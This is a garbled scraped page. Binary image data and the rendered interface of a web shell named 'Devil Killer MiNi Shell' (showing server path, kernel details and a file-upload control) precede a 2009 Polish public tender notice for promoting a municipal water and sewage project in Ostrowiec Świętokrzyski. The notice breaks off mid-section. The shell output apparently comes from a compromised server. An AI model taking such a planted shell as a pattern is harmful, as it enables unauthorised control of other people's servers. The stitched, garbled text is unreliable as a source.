JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090728/257132-N-2009.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: KONTRAKT NR 10: Informacja i promocja Projektu UPORZĄDKOWANIE    GOSPODARKI WODNO-ŚCIEKOWEJ W AGLOMERACJI OSTROWIEC ŚWIĘTOKRZYSKI - ETAP I</b><br>
<b>Numer ogłoszenia: 257132 - 2009; data zamieszczenia: 28.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Wodociągi i Kanalizacja sp. z o.o. , ul. Sienkiewicza 91, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. 041 2661200, faks 041 2661010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi.ostrowiec.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością - 100% udziałów Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONTRAKT NR 10: Informacja i promocja Projektu UPORZĄDKOWANIE    GOSPODARKI WODNO-ŚCIEKOWEJ W AGLOMERACJI OSTROWIEC ŚWIĘTOKRZYSKI - ETAP I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Celem niniejszego zamówienia jest prowadzenie działań w zakresie Informacji i Promocji Projektu  pn. Uporządkowanie gospodarki wodno-ściekowej w aglomeracji Ostrowiec Świętokrzyski - etap I zgodnie z wymaganiami obowiązującymi w zakresie wdrażania projektów Funduszu Spójności.
Powyższy Projekt dofinansowany jest - zgodnie z umową o dofinansowanie nr POIS.01.01.00-00-126/-9-00, z Funduszu Spójności Unii Europejskiej w ramach działania 1.1 - Gospodarka wodno ściekowa w aglomeracjach powyżej 15 000 RLM priorytetu I Gospodarka wodno - ściekowa Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.

2. Projekt Funduszu Spójności pn. Uporządkowanie gospodarki wodno-ściekowej w aglomeracji Ostrowiec Świętokrzyski - etap I jest przewidziany do realizacji w latach 2009 - 2013 i składa się z następujących zadań:

Kontrakt Nr1
Opracowanie dokumentacji niezbędnej do wystąpienia z wnioskiem o dofinansowanie z Funduszu Spójności dla przedsięwzięcia o nazwie Uporządkowanie gospodarki wodno ściekowej w aglomeracji Ostrowiec Świętokrzyski

Kontrakt Nr2
Rozbudowa sieci kanalizacji sanitarnej na osiedlu Gutwin - budowa kanalizacji sanitarnej w ul. Siennieńskiej

Kontrakt Nr3
Rozbudowa sieci kanalizacji sanitarnej na osiedlu Gutwin

Kontrakt Nr4
Rozbudowa sieci kanalizacji sanitarnej w rejonie ul. Szewieńskiej i ul. Świętokrzyskiej

Kontrakt Nr5
Rozbudowa sieci kanalizacji sanitarnej w rejonie ul. Bałtowskiej

Kontrakt Nr6
Przebudowa magistrali wodociągowej

Kontrakt Nr7
Przebudowa i modernizacja oczyszczalni ścieków w Ostrowcu Świętokrzyskim

Kontrakt Nr 8
Inżynier Kontraktu

Kontrakt Nr 9
Pomoc Techniczna dla JRP

Kontrakt Nr 10
Informacja i Promocja Projektu

3. Przedmiot zamówienia będzie obejmował w szczególności:
1) Opracowanie, druk oraz dystrybucję broszury informacyjnej dotyczącej Projektu,
2) Opracowanie i wykonanie materiałów audiowizualnych dotyczących realizacji Projektu,
3) Organizację 2 konferencji na temat realizacji Projektu
4) Opracowanie podstrony internetowej poświęconej realizacji Projektu
5) Wykonanie oraz zainstalowanie tablic pamiątkowych upamiętniających współfinansowanie Projektu przez Wspólnotę Europejską.
6) Opracowanie informacji prasowych do przekazania mediom oraz opracowanie i zamieszczenie płatnych ogłoszeń prasowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5, 79.34.00.00-9, 79.82.40.00-6, 92.11.12.50-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium

1. Wysokość wadium.

1) Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium o wartości  
3.000  PLN (słownie: trzy tysiące PLN),
2) Okres ważności wadium musi obejmować cały okres związania ofertą.

2. Forma wadium.

1) Wadium może być wniesione w następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U 2007 r. Nr 42 poz. 275).

2) W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (instytucji udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
c) kwotę gwarancji/poręczenia,
d) termin ważności gwarancji/poręczenia,
e) zobowiązanie gwaranta/poręczyciela do: zapłacenia kwoty gwarancji/poręczenia 
na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:
- Wykonawca z przyczyn leżących po jego stronie, w odpowiedzi na wezwanie 
o którym mowa w art.26 ust 3 u.p.z.p., nie złożył wymaganych dokumentów 
lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p. lub pełnomocnictw, lub
- Wykonawca, którego Ofertę wybrano odmówił podpisania umowy na warunkach określonych w ofercie, lub
- Wykonawca, którego Ofertę wybrano nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
f) gwarancja/poręczenie winno być nieodwołalne i bezwarunkowe;
g) gwarancja/poręczenie musi być wykonalne na terytorium Rzeczpospolitej Polskiej.
h) wszelkie spory dotyczące gwarancji/poręczenia podlegają rozstrzygnięciu zgodnie z prawem Rzeczpospolitej Polskiej i podlegają kompetencji sądu właściwego 
dla siedziby Zamawiającego.
i) jednocześnie Zamawiający wymaga, aby okres ważności gwarancji/poręczenia 
nie był krótszy niż okres związania Ofertą.

3. Miejsce i sposób wniesienia wadium.

1) Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego:
PEKAO S.A. O/Ostrowiec Św.  44 1240 1372 1111 0010 2276 9140
Przelew powinien wskazywać numer i nazwę postępowania na które Wykonawca składa Ofertę.

Do Oferty należy dołączyć kopię polecenia przelewu lub kopię gwarancji/poręczenia  wniesionych/złożonych jako wadium, potwierdzoną za zgodność z oryginałem przez Wykonawcę.

2) Wadium wnoszone w innych niż pieniądz formach, należy złożyć najpóźniej wraz z ofertą (jako oddzielny od oferty dokument) lub w Kasie MWiK Sp. z o.o., tj. w Ostrowcu Świętokrzyskim przy ul. Sienkiewicza 91, w Biurze Obsługi Klienta - Kasa, 
od poniedziałku do piątku w godz. 7:30-14:30.

4. Termin wniesienia wadium.

1) Wadium należy wnieść przed upływem terminu składania Ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania Ofert. 
2) W wymienionym przypadku dołączenie do Oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
3) Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium w związku z wykluczeniem z postępowania lub odrzuceniem Oferty, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia Oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.

5. Zwrot wadium.

Zamawiający zwraca niezwłocznie wadium, według zasad określonych w art. 46 u.p.z.p.

6. Utrata wadium.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
1) Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, dokumentów 
lub pełnomocnictw (w zależności od przypadku) , o którym mowa w art. 26 ust. 3 u.p.z.p., nie złożył wymaganych dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p. lub pełnomocnictw (w zależności od przypadku), chyba ze Wykonawca  udowodni, ze wynika to z przyczyn nie leżących po jego stronie; 
2) Wykonawca, którego Oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
3) Wykonawca, którego Oferta została wybrana nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
4) Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1. posiadać uprawnienia do wykonywania określonej działalności lub czynności.
     Zamawiający dokona oceny spełnienia przez Wykonawcę powyższego warunku udziału w postępowaniu na podstawie następujących dokumentów złożonych przez Wykonawcę:
1)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	oświadczenia Wykonawcy potwierdzającego spełnienie wymagań, określonych w art.22 ust.1 u.p.z.p., sporządzonego według wzoru stanowiącego załącznik nr 2 do niniejszej IDW,

2. posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki:
a)	wykonać w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedną usługę polegającą na organizacji kampanii informacyjno - promocyjnej. 
	Zamawiający dokona oceny spełnienia przez Wykonawcę powyższego warunku udziału w postępowaniu na podstawie następujących dokumentów złożonych przez Wykonawcę:

1) wykazu wykonanych we wskazanym okresie usług, z podaniem ich rodzaju oraz daty i miejsca wykonania, sporządzonym według wzoru stanowiącego załącznik nr 3 do niniejszej IDW oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie),

2) oświadczenia Wykonawcy potwierdzającego spełnienie wymagań, określonych w art.22 ust.1 u.p.z.p., sporządzonego według wzoru stanowiącego załącznik nr 2 do niniejszej IDW,
	
3. znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki: 
a)	Wykonawca osiągnął w każdym z ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przychody netto 
ze sprzedaży, w kwocie co najmniej 200.000 PLN,
b)	Wykonawca osiągnął w każdym z ostatnich trzech latach obrotowych dodatni wynik finansowy lub ujemny z tendencją do poprawy, a jeżeli okres działalności wykonawcy jest krótszy w pełnych latach obrotowych obejmujący powyższy okres działalności,
c)	Wykonawca posiada środki finansowe lub posiada zdolność kredytową 
w wysokości co najmniej 50.000 PLN,
d)	Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100 000 PLN.
      Zamawiający dokona oceny spełnienia przez Wykonawcę powyższego warunku udziału w postępowaniu na podstawie następujących dokumentów złożonych przez Wykonawcę:
1) rachunku zysków i strat, a jeżeli podlega on badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o rachunku zysków i strat, a w przypadku Wykonawców nie zobowiązanych do sporządzania rachunku zysków i strat innych dokumentów określających przychody netto ze sprzedaży za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, liczonych od daty wszczęcia postępowania,
2) informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania Ofert,
3) polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
4) oświadczenia Wykonawcy potwierdzającego spełnienie wymagań, określonych w art.22 ust.1 u.p.z.p., sporządzonego według wzoru stanowiącego załącznik nr 2 do niniejszej IDW,

4. nie podlegać wykluczeniu z postępowania na podstawie art. 24 u.p.z.p.;
     Zamawiający dokona oceny spełnienia przez Wykonawcę powyższego warunku udziału w postępowaniu na podstawie następujących dokumentów złożonych przez Wykonawcę:
1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania Ofert,
3) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania Ofert,
4) aktualnego zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania Ofert,
5) oświadczenia Wykonawcy potwierdzającego spełnienie wymagań, określonych w art.22 ust.1 u.p.z.p., sporządzonego według wzoru stanowiącego załącznik nr 2 do niniejszej IDW,

II. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.
III. W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż określono w poszczególnych podpunktach pkt 9 IDW, dane finansowe zostaną przeliczone na PLN według średniego kursu (tabela A) Narodowego Banku Polskiego (NBP) opublikowanego w dniu ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Ten sam kurs Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków określonych w pkt 9 IDW Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
1)	oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 
do niniejszych IDW, o spełnianiu warunków udziału w postępowaniu (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
lub więcej Wykonawców w ofercie musi być przedmiotowe oświadczenie złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenie złożone (podpisane) przez każdego z Wykonawców składających ofertę wspólną - jedynie w sytuacji jeśli każdy z nich spełnia wszystkie warunki samodzielnie).
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego 
nie wcześniej niż 6 miesięcy przed upływem terminu składania Ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
3) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania Ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
4) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania Ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
5) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, 
lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania Ofert (w przypadku wspólnego ubiegania się 
o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców 
w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
6) wykaz wykonanych we wskazanym okresie usług, z podaniem ich rodzaju oraz daty i miejsca wykonania, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW oraz załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie;
7) rachunek zysków i strat, a jeżeli podlega on badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o rachunku zysków i strat, 
a w przypadku Wykonawców nie zobowiązanych do sporządzania rachunku zysków 
i strat innych dokumentów określających przychody netto ze sprzedaży za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - 
za ten okres, liczonych od daty wszczęcia postępowania (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa. 
Dla potwierdzenia spełnienia tego warunku przez Wykonawców składających Ofertę wspólną wystarczy złożenie tego (-ch) dokumentów przez tego/tych Wykonawcę/Wykonawców, który/którzy spełnia/spełniają ten warunek);
8) informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania Ofert (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa. 
Dla potwierdzenia spełnienia tego warunku przez Wykonawców składających Ofertę wspólną wystarczy złożenie tego (-ch) dokumentów przez tego/tych Wykonawcę/Wykonawców, który/którzy spełnia/spełniają ten warunek);
9) polisę lub inny dokument potwierdzający, ze Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa. Dla potwierdzenia spełnienia tego warunku przez Wykonawców składających Ofertę wspólną wystarczy złożenie tego (-ch) dokumentów przez tego/tych Wykonawcę/Wykonawców, który/którzy spełnia/spełniają ten warunek).
W przypadku wyboru oferty Wykonawca jest zobowiązany przedłużać ważność polisy lub innego dokumentu potwierdzającego posiadanie ubezpieczenia od odpowiedzialności cywilnej, tak aby ubezpieczenie obejmowało cały okres realizacji umowy.

2. Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane:
1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej:
   - w pkt 10.1.2), 10.1.4) i 10.1.5), składa dokument lub dokumenty, wystawione w Kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
   - w pkt 10.1.3) składa zaświadczenie właściwego organu sądowego  lub   administracyjnego Kraju pochodzenia albo zamieszkania osoby, 
której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p. 
2) dokumenty, o których mowa w pkt 10.2.1)a) i b) oraz w pkt 10.1.3), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania Ofert. Dokument, o którym mowa w pkt 10.2.1)c) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania Ofert.
3) jeżeli w Kraju pochodzenia osoby lub w Kraju, w którym Wykonawca ma siedzibę 
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej 
w pkt 10.2.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio Kraju pochodzenia osoby lub Kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis 
pkt 10.2.2) stosuje się odpowiednio.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. 

1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 10 SIWZ. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
